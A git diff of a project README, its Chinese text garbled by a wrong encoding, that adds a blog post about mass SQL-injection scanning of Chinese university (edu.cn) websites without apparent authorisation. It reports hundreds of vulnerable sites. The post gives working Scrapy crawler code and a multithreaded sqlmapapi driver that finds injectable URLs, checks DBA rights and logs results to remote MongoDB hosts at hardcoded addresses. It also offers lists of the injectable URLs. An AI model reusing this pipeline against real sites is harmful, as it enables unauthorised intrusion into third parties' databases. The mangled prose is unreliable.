diff --git a/ReadMe.md b/ReadMe.md index 8d091596ae9a3f62fe4cc667d88264f606995c86..72a27ffed685ee8214a39c1603ad57558dae90fd 100644 --- a/ReadMe.md +++ b/ReadMe.md @@ -1 +1,362 @@ -æš‘å‡æ—¶å€™å¯¹ä¸å›½edu_cn进行的一次简å•çš„SQL注入扫æï¼Œé…åˆ [æ¤æ–‡](http://blog.fiht.me/2016/11/22/edu-scan-report-md/) 食用更有风味. 基本模型已ç»å‡ºæ¥äº†ï¼Œå‰©ä¸‹è¿˜éœ€è¦ä¸€ä¸ªbash脚本,精力有é™ï¼Œå°±ä¸æ€»ç»“了,有感兴趣的åŒå¦ç•™ä¸‹issue,我看到了会回å¤ä½ 们 +æš‘å‡æ—¶å€™å¯¹ä¸å›½edu_cn进行的一次简å•çš„SQL注入扫æï¼Œé…åˆ [æ¤æ–‡](https://blog.fiht.me/archives/60/) 食用更有风味. 基本模型已ç»å‡ºæ¥äº†ï¼Œå‰©ä¸‹è¿˜éœ€è¦ä¸€ä¸ªbash脚本,精力有é™ï¼Œå°±ä¸æ€»ç»“了,有感兴趣的åŒå¦ç•™ä¸‹issue,我看到了会回å¤ä½ 们 +## 关于开放使用 +ç”¨çš„è¿™ä¸ªæ¡†æž¶å·²ç»æ¯”较æˆç†Ÿäº†ï¼Œä½†æ˜¯å¯¹äºŽformå’Œajaxæ— åŠ›ï¼Œè€ƒè™‘åœ¨é‡æž„。谢谢å„ä½çš„关注 +å› ä¸ºè¿‘æœŸåšå®¢æ•´æ”¹ï¼Œæ‰€ä»¥è´´ä¸Šåšæ–‡ï¼š + + +--- +title: 对全国edu.cn域å的一次SQL注入扫æå·¥ä½œ.md +date: 2016-11-22 12:06:59 +tags: [SQL注入,扫æå™¨] +categories: 网络空间安全 +--- +本文所有内容纯属虚构,本人ä¸å¯¹æ¤æ–‡ç« 的真实性,数æ®çš„æœ‰æ•ˆæ€§è´Ÿè´£ã€‚ +<!-- more --> +# 记一次对全网edu.cn的扫æå·¥ä½œ + +æš‘å‡æ¯”较闲,于是完æˆäº†è¿™ä¸€æ¬¡å¯¹æ•´ä¸ªæ•™è‚²ç½‘edu.cn域åçš„SQL注入的扫æã€‚è¿™ç¯‡æ–‡æ¡£å°†ä¼šä»‹ç»æˆ‘实现这次扫æçš„æ•´ä¸ªè¿‡ç¨‹å’Œè¿™æ¬¡æ‰«æè¿‡ç¨‹ä¸ç”¨åˆ°çš„部分工具/代ç +## 首先介ç»ä¸€ä¸‹æˆæžœ +1. 本次一共选å–了959个edu.cn顶级域å,覆盖了近7w个二级域å。检测的有效URL达到21wæ¡ã€‚一共检查出498ä¸ªå«æœ‰SQL注入的网站。 +2. 爬虫模å—使用3å°è…¾è®¯äº‘16H16Gå†…å˜æœåŠ¡å™¨ï¼Œå…±è€—æ—¶3H,花费近150å…ƒ +3. URL检测部分使用实验室8H16GæœåŠ¡å™¨ï¼Œè€—æ—¶çº¦ä¸€å‘¨ + +## 工作æµç¨‹ +1. 找到edu.cn的域å +2. æ‰¾åˆ°ä¸Šè¿°åŸŸåæ——下的å域å +3. 使用爬虫模å—,找到å域åä¸åŒ…å«çš„URLä¸å¸¦=çš„URL,并增é‡çˆ¬å–ï¼ˆæ²¡æœ‰åŠ å…¥å¯¹formè¡¨æ ¼å’Œjs的处ç†ï¼‰ +4. 利用sqlmapapi,检测上述URL + +## 找到edu.cn的域å +使用脚本:[click_me](#) +使用æ¤è„šæœ¬èŽ·å–到edu域å(有é‡å¤çš„去é‡ï¼Œä¸æ˜¯é‡ç‚¹ï¼Œæš‚ä¸è§£é‡Šï¼‰ +## 找到edu.cn 对应的二级域å +使用脚本:[click_me](#)s + +## çˆ¬è™«æ¨¡å— +爬虫模å—使用的是Scrapy框架,关于Scrapy框架的使用[Scrapy官方网站](https://scrapy.org/) +关键代ç : +1. spider.py +```python +#---------------------------------------------------------------------- +def __init__(self): + '''从Mongo里é¢å–出数æ®ï¼Œå¹¶å°†æ£åœ¨çˆ¬å–æ ‡å¿—ä½ç½®ä¸º1''' + db = pymongo.MongoClient('119.29.70.15')['edu_cns']['things'] + things = db.find_one({'scrapyed':{'$exists':False}}) + db.update({'_id':things['_id']},{'$set':{'scrapyed':'1'}}) + self.start_urls =[ 'http://%s'%i for i in things['subDomains']] + self.allowed_domains = [things['host']] + print things + self.host = things['host'] + self._id = things['_id'] + +def parse(self,response): + """parse""" + if not hasattr(response,'xpath'): + return + for url in response.xpath('//*[@href]/@href').extract(): + url = response.urljoin(url) # 转化æˆç»å¯¹è·¯å¾„ + yield scrapy.Request(url) + if '=' in url and '.css' not in url and 'javascript:' not in url and "tree.TreeTempUrl" not in url and '?' in url: #一个粗略的检查,这里写得很ä¸å¥½ï¼Œéœ€è¦é‡æž„ + item = UrlInjection() + item['url'] = url + item['_id'] = self._id + yield item + +``` +2. URL过滤器 +从Spider返回ç‰å¾…爬å–的链接,到了这里æ¥å޻除é‡å¤ +```python +class CustomFilter(RFPDupeFilter): + def __init__(self,path=None,debug=None): + RFPDupeFilter.__init__(self,path,debug) + self.fingerprints = {} + + def __getid(self,url): # 使用Domain 作为key + '''example: + input http://www.sdu.edu.cn/path/to/file?key1=1&key2=2 + return www.sdu.edu.cn + ''' + mm = urlparse(url)[1] + return mm + + def request_seen(self, request): # 如果ä¸éœ€è¦ç»§ç»çˆ¬å–,则返回True,URL被过滤 + fp = self.__getid(request.url) + if not self.fingerprints.has_key(fp): # 没有爬å–过 + self.fingerprints[fp]=0 + return False + else: + if self.fingerprints[fp]<200: # æ¯ä¸ªç½‘站最多åªçˆ¬å–200个链接 + self.fingerprints[fp]+=1 + return False + else: + return True +~ +``` + +3. pipeline.py +处ç†ä»ŽSpider里é¢è¿”回的Item +```python +class MongoDBPipeline: + """对爬å–到的URL进行去é‡ä¹‹åŽå†™å…¥æ•°æ®åº“""" + #---------------------------------------------------------------------- + def __init__(self): + connection = pymongo.MongoClient( + settings['MONGODB_SERVER'], + settings['MONGODB_PORT'] + ) + db = connection[settings['MONGODB_DB']] + self.collection = db[settings['MONGODB_COLLECTION']] + self.se = set() + def process_item(self, item, spider): + valid = True + url = item['url'] + key = url[:url.find('?')] + if key not in self.se: +# self.collection.insert(dict(item)) +# i.update({'host':'hnjd.edu.c3n'},{'$push':{'url':{"$each":[6]}}}) + self.collection.update({'_id':item['_id']},{"$push":{"url":item['url']}}) + self.se.add(key) + else: + pass + return item + +``` +## æ³¨å…¥ç‚¹æ£€æµ‹æ¨¡å— +使用的是sqlmapapiï¼Œä»£ç æ˜¯å½“时在Wooyun社区看到的一个模å—,ä¿å˜äº†åŽŸä½œè€…ä¿¡æ¯ï¼š +```python +#!/usr/bin/python +# -*- coding:utf-8 -*- + +import time +import json +import urllib +import urllib2 +#import redis +import sys +import requests +import param +import threading +from Queue import Queue +from pymongo import MongoClient +import sys +reload(sys) +sys.setdefaultencoding('utf-8') +que = Queue() +result_que = Queue() +count = 0 +MONGO_SERVER = '211.87.234.98' +MONGO_PORT = 27017 +MONGO_DATABASE = 'edu_cnResults' +MONGO_COLLECTION = 'urls' +db = MongoClient(MONGO_SERVER,MONGO_PORT)[MONGO_DATABASE][MONGO_COLLECTION] +mutex = threading.Lock() +result_file = open('/tmp/resulttttt','w+') +class Autoinj(threading.Thread): + """ + sqlmapapi 接å£å»ºç«‹å’Œç®¡ç†sqlmap任务 + by zhangh (zhanghang.org#gmail.com) + modefied by fiht(fiht#qq.com) + """ + + def __init__(self, server='', target='', method='', data='', cookie='', referer=''): + threading.Thread.__init__(self) + self.server = server + if self.server[-1] != '/': + self.server = self.server + '/' + # if method == "GET": + # self.target = target + '?' + data + # else: + # self.target = target + self.target = '' + self.taskid = '' + self.engineid = '' + self.status = '' + self.method = method + self.data = data + self.referer = referer + self.cookie = cookie + self.start_time = time.time() + #print "server: %s \ttarget:%s \tmethod:%s \tdata:%s \tcookie:%s" % (self.server, self.target, self.method, self.data, self.cookie) + #---------------------------------------------------------------------- + def get_target(self): + """从数æ®åº“䏿‰¾target,以åŽå¯ä»¥åŠ ä¸€ä¸ªç”¨æ–‡ä»¶æ‰¾çš„""" + mutex.acquire() + result=db.find_one({'Scaning':{'$exists':False}}) + if result: + self.target=result['url'] + db.update({'url':result['url']},{'$set':{'Scaning':1}}) + print('æ£åœ¨æ£€æµ‹%s'%self.target) + mutex.release() + return True + else: + print('没法从数æ®åº“里é¢å–出数æ®') + mutex.release() + return False + def task_new(self): + code = urllib.urlopen(self.server + param.task_new).read() + self.taskid = json.loads(code)['taskid'] + return True + + def task_delete(self): + url = self.server + param.task_del + url = url.replace(param.taskid, self.taskid) + requests.get(url).json() + + def scan_start(self): + headers = {'Content-Type':'application/json'} + url = self.server + param.scan_task_start + url = url.replace(param.taskid, self.taskid) + data = {'url':self.target} + t = requests.post(url, data=json.dumps(data), headers=headers).text + t = json.loads(t) + self.engineid = t['engineid'] + return True + + def scan_status(self): + url = self.server + param.scan_task_status + url = url.replace(param.taskid, self.taskid) + self.status = requests.get(url).json()['status'] + + def scan_data(self): + url = self.server + param.scan_task_data + url = url.replace(param.taskid, self.taskid) + return requests.get(url).json() + + def option_set(self): + headers = {'Content-Type':'application/json'} + url = self.server + param.option_task_set + url = url.replace(param.taskid, self.taskid) + data = {} + if self.method == "POST": + data["data"] = self.data + if len(self.cookie)>1: + data["cookie"] = self.cookie + #print data + data['threads'] = 10 + data['smart'] = True + data['is-dba'] = True + t = requests.post(url, data=json.dumps(data), headers=headers).text + t = json.loads(t) + + def option_get(self): + url = self.server + param.option_task_get + url = url.replace(param.taskid, self.taskid) + return requests.get(url).json() + + def scan_stop(self): + url = self.server + param.scan_task_stop + url = url.replace(param.taskid, self.taskid) + return requests.get(url).json() + + def scan_kill(self): + url = self.server + param.scan_task_kill + url = url.replace(param.taskid, self.taskid) + return requests.get(url).json() + + def start_test(self): + # 开始任务 + #self.target=que.get() + self.start_time = time.time() + if not self.task_new(): + print("Error: task created failed.") + return False + # 设置扫æå‚æ•° + self.option_set() + # å¯åŠ¨æ‰«æä»»åŠ¡ + if not self.scan_start(): + print("Error: scan start failed.") + return False + # ç‰å¾…扫æä»»åŠ¡ + while True: + self.scan_status() + if self.status == 'running': + time.sleep(40) + elif self.status== 'terminated': + break + else: + print "unkown status" + break + if time.time() - self.start_time > 3000: #多于五分钟 + error = True + print('åˆ é™¤ä¸€ä¸ªä¸æ€Žä¹ˆå¸¦åŠ²çš„IP:%s'%self.target) + count += 1 + self.scan_stop() + self.scan_kill() + return [self.target,0] + + # å–结果 + res = self.scan_data() + # åˆ ä»»åŠ¡ + self.task_delete() + global count + + print(res['data']) + if res['data']: + count += 1 + print("耗时:" + str(time.time() - self.start_time)) + print('å·²ç»æ£€æµ‹%d个url'%count) + return [self.target,res['data'][0]['value'][0]['dbms']] + else: + count += 1 + print("耗时:" + str(time.time() - self.start_time)) + print('å·²ç»æ£€æµ‹%d个url'%count) + return [self.target,0] + + #---------------------------------------------------------------------- + def run(self): + """ä¸åœåœ°æ‰¾""" + while(self.get_target()): + try: + result = self.start_test() + #print('----->',result) + if result[1]: + mutex.acquire() + db.update({'url':result[0]},{'$set':{'injection':1,'info':result[1]}}) + print('找到一个url%s'%self.target) + result_file.writelines(self.target+'--->'+str(result[1])) + mutex.release() + else: + mutex.acquire() + db.update({'url':result[0]},{'$set':{'injection':0}}) + mutex.release() + except Exception as e: + print e + break +host_list = ['http://localhost:8775/','http://localhost:8776/','http://localhost:8776', + 'http://localhost:8775/', +# 'http://139.129.25.173:8775/',#,'http://139.129.25.173:8775/', +# 'http://123.206.65.93:8775/' + ] +#---------------------------------------------------------------------- +def main(): + threads = [Autoinj(host) for i in range(50) for host in host_list] # 一个client实例一次处ç†10个注入点 + for thread_ in threads: + thread_.start() + +if __name__=='__main__': + start_time = time.time() + # for i in open('/tmp/sss').readlines(): + # #print('http://%s'%i.strip()) + # que.put(i.strip()) + main() + #host = ['http://localhost:8775/'] + #print('一共花费时间%s,一共找到注入%s'%(time.time()-start_time,result_que.qsize())) +#if Autoinj(server='http://localhost:8775/',target='http://f5eca5159a6076025.jie.sangebaimao.com/mysql/get_str.php?id=1').run()['data']: + +``` + +## 资æºåˆ†äº« +**仅适用于科å¦ç ”究,勿åšä»–用** +[å„ä¸ªé«˜æ ¡çš„åŸŸåæ‰“包](#) +[21w个url](#) +[嫿œ‰æ³¨å…¥ç‚¹çš„URL](#) + +冿¥åˆ†äº«ä¸€äº›æœ‰æ„æ€çš„事情: +1. å„é«˜æ ¡çš„å域å统计: +<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=bd3cb7edaad1db64"></iframe> +å‘çŽ°å±±å¤§çš„ä¸»åŸŸåæœ€å¤šï¼Œè¾¾åˆ°äº†900余个 +2. å„é«˜æ ¡çš„SQL注入点统计: +<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=94fe130e9d6a82e2"></iframe> + +3. å˜åœ¨SQL注入的数æ®åº“类型统计: +<iframe style="width: 100%; height: 100%" src="http://www.tubiaoxiu.com/p.html?s=7258f3b0690d082f"></iframe>